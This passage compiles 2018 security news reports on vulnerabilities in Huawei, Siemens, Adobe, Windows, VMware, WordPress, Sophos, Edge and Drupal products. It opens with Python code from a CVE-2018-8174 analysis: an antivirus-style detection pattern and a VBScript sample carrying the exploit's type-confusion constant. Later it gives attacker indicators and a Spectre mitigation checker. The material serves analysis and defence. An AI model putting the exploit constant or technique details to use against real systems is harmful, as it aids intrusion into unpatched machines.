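    ptr_after = struct.unpack_from("<I", after, 8)[0]
    return VT_BSTR, vt_after, ptr_after


# Defender heuristic: CDbl("...") literals whose double image contains an array type word.
CDBL_RE = re.compile(r'CDbl\(\s*"([^"]+)"\s*\)', re.IGNORECASE)


def suspicious_cdbl_constants(script: str) -> list:
    """(literal, bits) for each CDbl string literal whose 8-byte image holds a
    16-bit word with VT_ARRAY set and VT_VARIANT in the low 12 bits."""
    hits = []
    for lit in CDBL_RE.findall(script):
        try:
            bits = double_bits(float(lit))
        except ValueError:
            continue
        for off in range(7):
            word = (bits >> (8 * off)) & 0xFFFF
            if word & VT_ARRAY and (word & 0x0FFF) == VT_VARIANT:
                hits.append((lit, bits))
                break
    return hits


# Constructed sample: the article's property getter plus a harmless CDbl call.
SAMPLE_SCRIPT = '''
Class lllIIl
Public Default Property Get P
P=CDbl("174088534690791e-324")
End Property
End Class
x = CDbl("3.14")
'''

if __name__ == "__main__":
    for n in ("p", "SetProp", "mem", "P0123456789", "SPP"):
        print(f"VVAL {n!r}: 0x{vval_alloc_size(n):x} bytes")
    print(suspicious_cdbl_constants(SAMPLE_SCRIPT))
    print([hex(v) for v in string_to_array_type_confusion(float("174088534690791e-324"))])
```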

Conclusion
Our scripts for disassembling VBScript compiled into p-code enable VBScript debugging at the bytecode level, which helps to analyze exploits and understand how VBScript operates. They are available in our GitHub repository.

The case of CVE-2018-8174 demonstrates that when memory allocations are highly predictable, use-after-free vulnerabilities are easy to exploit. The in-the-wild exploit targets older versions of Windows. The location of objects in memory required for its exploitation is most likely to occur in Windows 7 and Windows 8.1.

Automatic Exploit Protection (AEP), part of Kaspersky Lab products, blocks all stages of the exploit with the following verdicts:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic


Huawei enterprise and broadcast products have a crypto bug. Fix it now!
4.7.2018 securityaffairs
Vulnerebility

Huawei has rolled out security fixes for some enterprise and broadcast products to address a cryptography issue tracked as CVE-2017-17174.
Huawei has released security updates for some enterprise and broadcast products to address a cryptography issue that was discovered in late 2017.

The vulnerability, tracked as CVE-2017-17174, is related to the implementation of an insecure encryption algorithm and could be exploited in a man-in-the-middle (MitM) attack to decrypt a session key and recover the content of the entire session.

“There is a weak algorithm vulnerability in some Huawei products. A remote, unauthenticated attacker may capture traffic between clients and the affected products.” reads the security advisory published by Huawei.

“Due to the use of insecure encryption algorithm, the attacker may decrypt the session key by some cryptanalytic operations and the traffic between the server and the client. Successful exploit may cause information leak.”

The following Huawei products using RSA encryption in TLS are potentially vulnerable:

The RSE6500 Recording and Streaming Engine version V500R002C00. A high-performance, full-HD recording and streaming engine that supports live video multicast and mobile Video on Demand (VoD).
The SoftCo unified communications software version V200R003C20SPCb00;
The VP9660 video conferencing multipoint control units version V600R006C10;
Multiple versions of its eSpace U1981 IP telephony and enterprise communications universal SIP gateway.

Huawei rated the vulnerability 5.3 (medium) because it is not easy to exploit. The company has released software updates to address the flaw for all of its affected products except the SoftCo unified communications software, which has been deprecated.

Every flaw discovered in the products of Chinese and Russian firms raises the alarm among governments that are already banning their solutions from critical infrastructure and government offices.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.


Flaws Expose Siemens Central Plant Clocks to Attacks
4.7.2018 securityweek
Vulnerebility

Siemens informed customers on Tuesday that some of its SICLOCK central plant clocks are affected by several vulnerabilities, including ones that have been rated “critical.”

Siemens SICLOCK devices are used to synchronize time in industrial plants. The central plant clock ensures stability in case of a failure or loss of reception at the primary time source.

According to the German industrial giant, SICLOCK systems are affected by a total of six vulnerabilities. The security holes have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856.


Three of the flaws have been classified as critical. One of them allows an attacker with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition – and possibly reboot – by sending it specially crafted packets.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed,” Siemens wrote in its advisory. “The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

Another critical vulnerability can be exploited by an attacker with access to UDP port 69 to modify the firmware on a targeted SICLOCK device. Access to the same port is also required for the exploitation of a different critical flaw that allows an attacker to modify the administrative client stored on the device and execute arbitrary code.

A high severity flaw disclosed by Siemens can allow a network attacker to bypass authentication, but exploitation requires the hacker to obtain specific information about the targeted device.


The remaining security holes are a medium severity issue that allows a man-in-the-middle (MitM) attacker to intercept unencrypted passwords stored in client configuration files, and a low severity bug that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Four of the six vulnerabilities can be exploited without any user interaction. Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The impacted products are SICLOCK TC100, which is designed for smaller plants, and SICLOCK TC400. Since both products are in the process of being phased out, Siemens has not released any firmware updates, and instead advised customers to apply a series of workarounds and mitigations that should reduce the risk of attacks.

Mitigations include the installation of redundant time sources and implementation of plausibility checks for critical controllers in the plant, and protecting network access to impacted devices.


Microsoft revealed that 2 Zero-Days found in March were part of a cyber weapon in an early development stage
3.7.2018 securityaffairs
Vulnerebility

Microsoft published technical details of 2 zero-days that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.
Security researchers from Microsoft have published technical details of two zero-day vulnerabilities that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.

The two issues were addressed by Microsoft with the May 2018 Patch Tuesday, before threat actors used them in attacks in the wild.

The first zero-day vulnerability is a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990), the second one is a privilege escalation flaw in Microsoft Windows (CVE-2018-8120).

“The first exploit attacks the Adobe JavaScript engine to run shellcode in the context of that module. The second exploit, which does not affect modern platforms like Windows 10, allows the shellcode to escape Adobe Reader sandbox and run with elevated privileges from Windows kernel memory. ESET provided an analysis of the exploitation routines in the sample PDF.” reads the analysis published by Microsoft.

Microsoft shared the technical details of both flaws only now because it wanted to give users enough time to update their operating systems and Adobe software.

In late March, experts at ESET analyzed a malicious PDF file that was uploaded on VirusTotal and provided it to the Microsoft security team.

The experts flagged the document “as a potential exploit for an unknown Windows kernel vulnerability.”

The analysis conducted by the Microsoft team revealed that the document includes two different zero-day exploits, one for Adobe Acrobat and Reader and one for Microsoft Windows.


According to Microsoft, the weaponized PDF file was in an early development stage: the code used by the attackers appeared to be proof-of-concept code, and the weaponized file did not deliver a malicious payload.

“Although the PDF sample was found in VirusTotal, we have not observed actual attacks perpetrated using these exploits. The exploit was in early development stage, given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code.” reads the analysis published by Microsoft.

Someone combined the two zero-days to build a very powerful attack vector.

The Adobe Acrobat and Reader exploit is included in the document as a specially crafted JPEG 2000 image that contains the JavaScript exploit code used to trigger a double-free vulnerability in the software to run shellcode.


The attackers were trying to chain this exploit with the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges.

Once the attacker has exploited the Adobe Reader vulnerability, he leverages the Windows zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privileges of the dropped PE file, which then runs in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

The PoC payload used in the sample dropped an empty vbs file in the Startup folder.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concluded ESET.

“Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Both Microsoft and ESET published technical details of the two zero-days, and both firms also shared the IoCs for the exploits.


Vulnerabilities Patched in VMware ESXi, Workstation, Fusion
2.7.2018 securityweek 
Vulnerebility

VMware informed customers last week that it patched several vulnerabilities that can lead to a denial-of-service (DoS) condition or information disclosure in its ESXi, Workstation, and Fusion products.

VMware described the flaws as out-of-bounds read issues in the shader translator component. An attacker with regular user privileges can exploit the security holes to obtain information or crash virtual machines.

The vulnerabilities, classified as “important,” are tracked as CVE-2018-6965, CVE-2018-6966 and CVE-2018-6967. A Tencent ZhanluLab researcher who uses the online moniker “RanchoIce” has been credited for reporting the flaws to VMware. A researcher from Cisco Talos independently discovered CVE-2018-6965.

According to VMware, the flaws impact ESXi 6.7 and Workstation 14.x running on any platform, and Fusion 10.x running on OS X. Patches and updates have been released for each of the affected products.

Cisco Talos has published an advisory containing technical details for CVE-2018-6965. The company has assigned a CVSS score of 6.5 to this vulnerability, which puts it near the “high severity” range.

“A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host),” Talos wrote in its advisory.

“In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability,” Talos added.


Unpatched WordPress Flaw Leads to Site Takeover, Code Execution
28.6.2018 securityweek
Vulnerebility

A file deletion vulnerability that remains unpatched 7 months after being reported allows for the complete takeover of WordPress sites and for arbitrary code execution.

The security flaw supposedly impacts all WordPress versions, including the latest 4.9.6 iteration. An attacker looking to exploit the issue would first have to gain privileges to edit and delete media files.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,” RIPS Technologies’ Karim El Ouerghemmi explains.

An attacker targeting the vulnerability can delete any file of the WordPress installation, as well as any file on the server the PHP process user has permissions to delete files from. An attacker could erase an entire WordPress installation and could also circumvent security measures to execute arbitrary code on the server.

Files that can be deleted include .htaccess (which may contain security related constraints), index.php files (granting an attacker a listing of all files in the WordPress directories), and wp-config.php (which contains the database credentials).

Deleting wp-config.php triggers the WordPress installation process on the next visit to the website, which allows the attacker to undergo the installation process and use admin credentials of their choice, thus being able to execute arbitrary code on the server.

The security researcher reported the vulnerability to WordPress in November last year, via HackerOne. The WordPress security team triaged and verified the issue soon after receiving the report, but no patch has been released to date, although they apparently estimated in January that a fix would become available within six months.

A hotfix available from RIPS Technologies can be integrated by site admins into existing WordPress installations by adding it to the functions.php file of the active theme. By making sure that the data provided for the meta-value thumb does not contain code that would make path traversal possible, the hotfix prevents security-relevant files from being deleted.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies notes.

Because it requires a user account, the vulnerability cannot be abused for the exploitation of arbitrary WordPress sites at scale. However, websites that share multiple user accounts should apply a hotfix, El Ouerghemmi points out.


Unpatched WordPress file deletion vulnerability could allow site takeover and code execution
28.6.2018 securityaffairs
Vulnerebility

Seven months ago, security experts discovered a critical file deletion vulnerability that affects all WordPress versions; the issue is still unpatched.
The vulnerability could be exploited to completely take over websites running the popular CMS and gain arbitrary code execution. The issue is severe if we consider the potential impact: WordPress is the most popular CMS and, according to w3tech, it is used by approximately 30% of all websites.

A pre-requisite to exploit the vulnerability is that the attacker would have to gain privileges to edit and delete media files. The vulnerability cannot be exploited in massive attacks because it requires a user account.

“The vulnerability was reported 7 months ago to the WordPress security team but still remains unpatched.” reads a blog post published by RIPS Technologies.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,”

An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server on which the PHP process user has the proper permissions to delete.

An arbitrary file deletion flaw occurs when it is possible to pass unsanitized input to a file deletion function.

In PHP an arbitrary file deletion occurs when the unlink() function is called and user input can affect parts of or the whole parameter $filename, which is the path of the file to delete, without undergoing proper sanitization.

The flaw resides in the WordPress Core, the code to trigger it was found in the wp-includes/post.php file:


In the wp_delete_attachment() function the content of $meta['thumb'] is passed to unlink() without undergoing any sanitization.

The purpose of this snippet of code is to delete the thumbnail of an image alongside its deletion.

The exploitation of the flaw could allow the deletion of the entire WordPress installation and could allow circumventing security measures to execute arbitrary code on the server.

The experts highlighted that the attacker can delete the following files:

.htaccess, which on some occasions includes security-related constraints (e.g., access constraints on some folders).
index.php files used to prevent the attacker listing files in WordPress folders.
wp-config.php that contains the database credentials.
RIPS Technologies reported the vulnerability to WordPress in November 2017 through the bug bounty program on HackerOne; although the WordPress team estimated that a patch would be available within six months, no fix has been released to date.

The experts published a video PoC of the attack showing how to delete the wp-config.php file in order to trigger the WordPress installation process on the next visit to the website. The WordPress install acts as if it hasn’t been installed yet and the attacker could abuse this status to execute arbitrary code.

“Deleting this file of a WordPress installation would trigger the WordPress installation process on the next visit to the website. This is due to the fact that wp-config.php contains the database credentials, and without its presence, WordPress acts as if it hasn’t been installed yet.” continues the analysis. “An attacker could delete this file, undergo the installation process with credentials of his choice for the administrator account and, finally, execute arbitrary code on the server.”

The researchers provided a hotfix that can be integrated by admins into existing WordPress installations by adding it to the functions.php file of the active theme.

The fix checks that the data provided for the meta-value thumb does not contain code that would make path traversal possible, so that the attacker can no longer delete arbitrary files.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies concludes.


Sophos Patches Privilege Escalation Flaws in SafeGuard Products
26.6.2018 securityweek 
Vulnerebility

Researchers discovered several vulnerabilities in Sophos SafeGuard full-disk and file encryption products. The flaws allow an attacker to escalate privileges on a compromised device and execute arbitrary code with SYSTEM permissions.

A total of seven local privilege escalation vulnerabilities have been identified by researchers at Nettitude. The security holes can be exploited via various IOCTL calls using specially crafted input buffers that allow attackers to control the execution path.

Nettitude has published technical details for each of the flaws, along with a video showing how an attacker with access to the targeted device can escalate privileges to SYSTEM.

According to an advisory published on Tuesday by Sophos, the vulnerabilities affect various versions of SafeGuard Enterprise Client, SafeGuard Easy and SafeGuard LAN Crypt for Windows. The bugs have been assigned the CVE identifiers CVE-2018-6851 through CVE-2018-6857.

“Sophos is not aware of any attacks leveraging those vulnerabilities or exploits for them being available,” the security firm wrote in its advisory. “Exploitation of those vulnerabilities requires running malicious code on the target machine and can result in privilege escalation. This vulnerability is not remotely exploitable (i.e. over the network).”

The vulnerabilities were reported to Sophos in January and patches were created in April. Sophos has advised users to install the available patches.


Oracle issued security patches for recently discovered Spectre and Meltdown issues
26.6.2018 securityaffairs
Vulnerebility

Last week Oracle started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown flaws.
In May, tech giants Intel, AMD, ARM, IBM, Microsoft and other tech firms teamed up to disclose two new variants of the Meltdown and Spectre issues.

The so-called Variant 4 (CVE-2018-3639) relies on a Speculative Store Bypass (SSB), while the Variant 3a (CVE-2018-3640) is a Rogue System Register.

Both Variant 4 and Variant 3a require local access to the targeted system to be exploited; for this reason they have been rated “medium severity”.

According to Oracle’s security advisory, Variant 4 affects Oracle Linux versions 6 and 7, and Oracle VM 3.4.

“Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.” reads the security advisory published by Oracle.

Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel.

“Two new processor vulnerabilities were publicly disclosed on May 21, 2018. They are vulnerabilities CVE-2018-3640 ( “Spectre v3a” or “Rogue System Register Read”) and CVE-2018-3639 (“Spectre v4” or “Speculative Store Buffer Bypass”). Both vulnerabilities have received a CVSS Base Score of 4.3.

Successful exploitation of vulnerability CVE-2018-3639 requires local access to the targeted system. Mitigating this vulnerability on affected systems will require both software and microcode updates.” states Oracle in a blog post.

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,”

Oracle promptly addressed the initial Meltdown and Spectre vulnerabilities in the January 2018 Critical Patch Update, just after their disclosure.

Since January, other side-channel attacks have been discovered, including BranchScope, SgxPectre, and the attacks against the System Management Mode (SMM) memory.


Oracle Patches New Spectre, Meltdown Vulnerabilities
25.6.2018 securityweek   
Vulnerebility

Oracle announced on Friday that it has started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown vulnerabilities.

Intel, AMD, ARM, IBM, Microsoft and other major tech companies last month coordinated the disclosure of two new variants of the speculative execution attack methods known as Meltdown and Spectre.

One of them, dubbed Variant 4, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. The second flaw, tracked as Variant 3a and CVE-2018-3640, is a Rogue System Register Read issue first documented by ARM back in January.

Variant 4 and Variant 3a have been rated “medium severity” and exploitation requires local access to the targeted system, Eric Maurice, director of security assurance at Oracle, noted in a blog post.

Maurice says Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel. According to Oracle’s advisory, Variant 4 impacts Oracle Linux versions 6 and 7, and Oracle VM 3.4.

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,” Maurice said.

Oracle patched the initial Meltdown and Spectre vulnerabilities in many of its products with the release of the January 2018 Critical Patch Update.

IBM has also released both operating system and firmware updates to patch Variant 4 in its Power Systems clients. Microsoft did implement some mitigations, but the company claims it has yet to identify any code patterns – in either its software or cloud services – that would allow Variant 4 attacks.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered method has allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.
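Both Oracle pieces above stress that Variant 4 is only mitigated once software and microcode updates are in place; on Linux hosts (Oracle Linux included) the kernel reports the outcome under /sys/devices/system/cpu/vulnerabilities/. The script below is an added example, not Oracle's or Intel's code: it assumes a kernel that exposes that sysfs directory (mainline 4.17+ for spec_store_bypass, or a distribution kernel carrying the backport), and the status strings in SAMPLE_STATUSES are constructed for illustration.

```python
"""Report which speculative-execution issues a Linux host still lists as
unmitigated, using the kernel's sysfs vulnerability interface.

Added example, not vendor code. Assumes a kernel that exposes
/sys/devices/system/cpu/vulnerabilities/; SAMPLE_STATUSES is constructed.
"""
import os
from typing import Dict, List, Optional

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"

# sysfs entry name -> the name the articles use for it
ENTRIES = {
    "meltdown": "Meltdown (Variant 3)",
    "spectre_v1": "Spectre Variant 1",
    "spectre_v2": "Spectre Variant 2",
    "spec_store_bypass": "Speculative Store Bypass (Variant 4, CVE-2018-3639)",
}

# Constructed sample: software mitigations present, but the SSB entry still
# reads "Vulnerable", which is what a host looks like before the microcode
# update the articles mention has been applied.
SAMPLE_STATUSES = {
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Mitigation: __user pointer sanitization\n",
    "spectre_v2": "Mitigation: Full generic retpoline\n",
    "spec_store_bypass": "Vulnerable\n",
}


def classify(status: Optional[str]) -> str:
    """Map one sysfs status line to mitigated / vulnerable / not_affected / unknown.

    The kernel prefixes every line with one of three literal words; anything
    else (or a missing file on an older kernel) is reported as unknown so it
    is never silently treated as safe.
    """
    if status is None:
        return "unknown"
    s = status.strip()
    if s.startswith("Not affected"):
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def assess(statuses: Dict[str, Optional[str]]) -> Dict[str, str]:
    """Classify every entry we care about; missing entries become unknown."""
    return {entry: classify(statuses.get(entry)) for entry in ENTRIES}


def needs_action(assessment: Dict[str, str]) -> List[str]:
    """Entries where the update has not taken effect (or cannot be confirmed)."""
    return [e for e, verdict in assessment.items() if verdict in ("vulnerable", "unknown")]


def read_sysfs(directory: str = SYSFS_DIR) -> Dict[str, Optional[str]]:
    """Read the live sysfs entries; None for any file that does not exist."""
    result: Dict[str, Optional[str]] = {}
    for entry in ENTRIES:
        try:
            with open(os.path.join(directory, entry)) as fh:
                result[entry] = fh.read()
        except OSError:
            result[entry] = None
    return result


if __name__ == "__main__":
    live = assess(read_sysfs())
    for entry, verdict in live.items():
        print(f"{ENTRIES[entry]:<55} {verdict}")
    pending = needs_action(live)
    print("action needed:", ", ".join(pending) if pending else "none")
```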


Vulnerabilities in Fredi Wi-Fi baby monitor can be exploited to use it as a spy cam
25.6.2018 securityaffairs
Vulnerebility

Vulnerabilities in Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.
Security researchers at SEC Consult discovered that vulnerabilities in the Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.


The investigation started when a mother from South Carolina USA, Jamie Summitt, claimed someone had taken control over the baby monitor.

Many commercial surveillance products leverage a “P2P cloud” feature that is enabled by default. Every device connects to a cloud server infrastructure and keeps this connection up. Mobile devices and desktop applications can connect to the camera via the cloud.

This architecture makes it easier for users to interact with the camera: no firewall rules, port forwarding rules or DDNS setup are required on the router. But this approach has many security drawbacks, as highlighted by the researchers:

The cloud server provider gets all the data (e.g. video streams that are viewed).
Open questions: Who runs these servers? Where are they located? Do they comply with local jurisdiction, e.g. also EU GDPR?
If the data connection is not properly encrypted, anyone who can intercept the connection is able to monitor all data that is exchanged.
The “P2P Cloud” feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the “P2P Cloud”.

The experts discovered that the P2P service connects directly to the cloud and can be accessed with no more than an 8-digit device number and a shared default password.

This means that anyone accessing the online portal could enter random device numbers together with the default password to view camera feeds.

“Unfortunately the device ID does not look very secure,” reads the post published by the researchers.

“Plus the default password is neither randomly generated nor device-specific. Unless the user has changed the password to a secure one, anyone can log in and interact with the camera by ‘trying’ different cloud IDs.”

SEC Consult researchers added that insecure Fredi Wi-Fi baby monitors could also be used by hackers as an entry point in the home networks that host them.

“The ‘P2P Cloud’ feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the ‘P2P Cloud’.” continues the report.

Is the problem limited to the Fredi Wi-Fi baby monitor?

Unfortunately no, because the Chinese company that provided the firmware for the Fredi baby monitors develops generic camera control apps for many other devices.

“Obviously, the device and the cloud service is not GDPR compliant.” conclude the experts.

“It seems that consumer electronics with opaque supply chains, paired with insecure, built-in cloud features that are enabled by default will keep us busy in the future,”

The experts also published IoCs to detect the presence of devices using the Gwelltimes “Cloud-Links” platform in an organization’s infrastructure.


Wavethrough CVE-2018-8235 flaw in Microsoft Edge leaks sensitive data
24.6.2018 securityaffairs
Vulnerebility

A flaw in the Edge browser, dubbed Wavethrough, addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited to read restricted data.
A bug in the Edge browser addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited by attackers via malicious or compromised websites to read restricted data.

The flaw was reported by Google developer Jake Archibald; it is tracked as CVE-2018-8235 and is tied to the way the browser handles requests of different origins.

“A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins.” reads the security advisory published by Microsoft.

“The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.”

An attacker could exploit the vulnerability to force the browser to leak restricted data. The attack scenarios could involve maliciously crafted websites, compromised domains, or websites that accept or host content provided by the user or advertisements.

The flaw was dubbed Wavethrough because the issue occurs when a site leverages service workers for the loading of multimedia content, together with the <audio> web API, which makes use of “range” requests.

“Browsers use this for resuming downloads, but it’s also used by media elements if the user seeks the media, so it can go straight to that point without downloading everything before it, or to pick up metadata if it’s one of those annoying media formats that has important metadata at the end of the file.” wrote Archibald.

“Unfortunately, via a service worker, that Range header was going missing (dun-dun-dunnnnnnnnn!). This is because media elements make what we call “no-cors” requests. Let’s push that onto the stack too”

The problem is caused by the fact that the Range header was missing via a service worker because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that.” continues the researcher.

“If you want to send fancy headers, the browser checks with the origin first, before making the request with the fancy headers. This is known as CORS.”

The expert highlighted that using special headers, the browser might also check with the origin before making the request, but some APIs ignore the checks resulting in the leakage of sensitive data.

The researcher observed that no-cors requests are sent with cookies and receive opaque responses; this implies that some APIs may access the data in these responses.

“Take <img> for instance. If you include an <img> that points to another origin, it’ll make a no-cors request to that origin using that origin’s cookies. If valid image data is returned, it’ll display on your site. Although you can’t access the pixel data of that image, data is still leaked through the width and height of the image. You also know whether or not you received valid image data.” continued the expert.

“Let’s say there’s an image that’s only accessible if the user is logged into a particular site. An attacker can tell from the load/error event of the <img> whether that user is logged into that site. The user’s privacy has been compromised. Yaaaay.”

Archibald described an attack scenario based on a specially crafted website that allowed him to discover that the beta and nightly versions of Firefox could allow the redirect and eventually exposed the duration of the requested audio. The bug was already patched by Mozilla.

The expert discovered that Edge was vulnerable too, but the browser also allowed the resulting audio to pass through the Web Audio API, so an attacker could monitor the samples being played. The expert noticed that the request is made with cookies, which means that the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” concluded the expert.


"Wavethrough" Bug in Microsoft Edge Leaks Sensitive Information
23.6.2018 securityweek 
Vulnerebility

A security vulnerability patched by Microsoft earlier this month in its Edge browser could be exploited via malicious or compromised websites to read restricted data.

Tracked as CVE-2018-8235, the flaw occurs in how “Microsoft Edge improperly handles requests of different origins,” Microsoft explains in an advisory. The issue results in Edge bypassing Same-Origin Policy (SOP) restrictions and allows for requests that should otherwise be ignored.

As a result, an attacker could exploit the vulnerability to force the user’s browser to send data otherwise restricted. Attacks could be performed via maliciously crafted websites, compromised domains, or through websites that accept or host user-provided content or advertisements.

The vulnerability was discovered by Google developer Jake Archibald, who named it Wavethrough, because the bug occurs when a site uses service workers for the loading of multimedia content, together with the <audio> web API, which makes use of “range” requests.

The Range headers can be used by “media elements if the user seeks the media, so it can go straight to that point without downloading everything before it,” Archibald explains.

What the security researcher discovered was that, via a service worker, the Range header was missing, because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that,” he notes.

When using special headers, the browser might also check with the origin before making the request, but some APIs ignore the checks, which could result in sensitive data being leaked. No-cors requests are sent with cookies and receive opaque responses, and some APIs may access the data in these responses.

Thus, when a media element makes a no-cors request with a Range header, fetch() removes the header, because it isn’t allowed in no-cors requests. However, because Range requests were never standardized in HTML, and because service workers are involved, a website could respond to them arbitrarily.

“You can respond to a request however you want, even if it's a no-cors request to another origin. For example, you can have an <img> on your page that points to facebook.com, but your service worker could return data from twitter.com,” the researcher explains.

After setting up a website that would do just that, Archibald discovered that the beta and nightly versions of Firefox allowed the redirect and eventually exposed the duration of the requested audio. The bug was patched before it made it to the stable Firefox release.

Edge too was found vulnerable, but it also allowed the resulting audio to pass through the web audio API, thus allowing for the monitoring of the samples being played. Because the request is made with cookies, the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” the researcher points out.

In addition to getting the bug addressed in Firefox and Edge, Archibald has been working on changing the standards regarding Range requests, so as to eliminate similar security issues. Furthermore, his discovery resulted in CORB being added to fetch().


Crooks exploit CVE-2018-7602 Drupal flaw, aka Drupalgeddon3 to deliver Monero miner
23.6.2018 securityaffairs
Vulnerebility

Crooks are attempting to exploit a recently patched Drupal vulnerability, tracked as CVE-2018-7602, to drop Monero mining malware onto vulnerable systems.
The CVE-2018-7602 flaw is a highly critical remote code execution issue, also known as Drupalgeddon3, that was addressed by the Drupal team in April with the release of versions 7.59, 8.4.8 and 8.5.3.

The security patch for the flaw only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has already been applied to the installation.

In May, security experts at Malwarebytes reported that crooks were exploiting both Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Now experts from Trend Micro have reported network attacks exploiting the CVE-2018-7602 flaw for Monero mining. Crooks used an exploit to fetch a shell script that retrieves an Executable and Linkable Format-based (ELF) downloader.

The malicious code adds a crontab entry to automatically update itself and to download and execute a modified variant of the open-source XMRig (version 2.6.3) Monero miner.

“We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.” reads the analysis published by TrendMicro.

“While these attacks currently deliver resource-stealing and system performance-slowing malware, the vulnerability can be used as a doorway to other threats.”

The attackers hid their activity behind the Tor network, but experts tracked it to 197[.]231[.]221[.]211, an address that belongs to a range of IPs associated with a virtual private network (VPN) provider.

The downloader checks the target machine to determine if it could be compromised using the Drupal exploits.

Once executed, the miner will change its process name to [^$I$^] and access the file /tmp/dvir.pid.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” continues the report.

Trend Micro confirmed that its experts have blocked 810 attacks coming from this IP address, but at the time there was no evidence that all the attacks were related to the Monero-mining payload.

“The bulk of attacks from this IP address exploit Heartbleed (CVE-2014-0160). The other attacks we observed exploited ShellShock (CVE-2014-6271), an information disclosure vulnerability in WEB GoAhead (CVE-2017-5674), and a memory leak flaw in Apache (CVE-2004-0113).” states Trend Micro.

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address.”

Drupal admins are urged to install the available patches as soon as possible to avoid being hacked.


Hackers Exploit Drupal Flaw for Monero Mining
22.6.2018 securityweek 
Vulnerebility

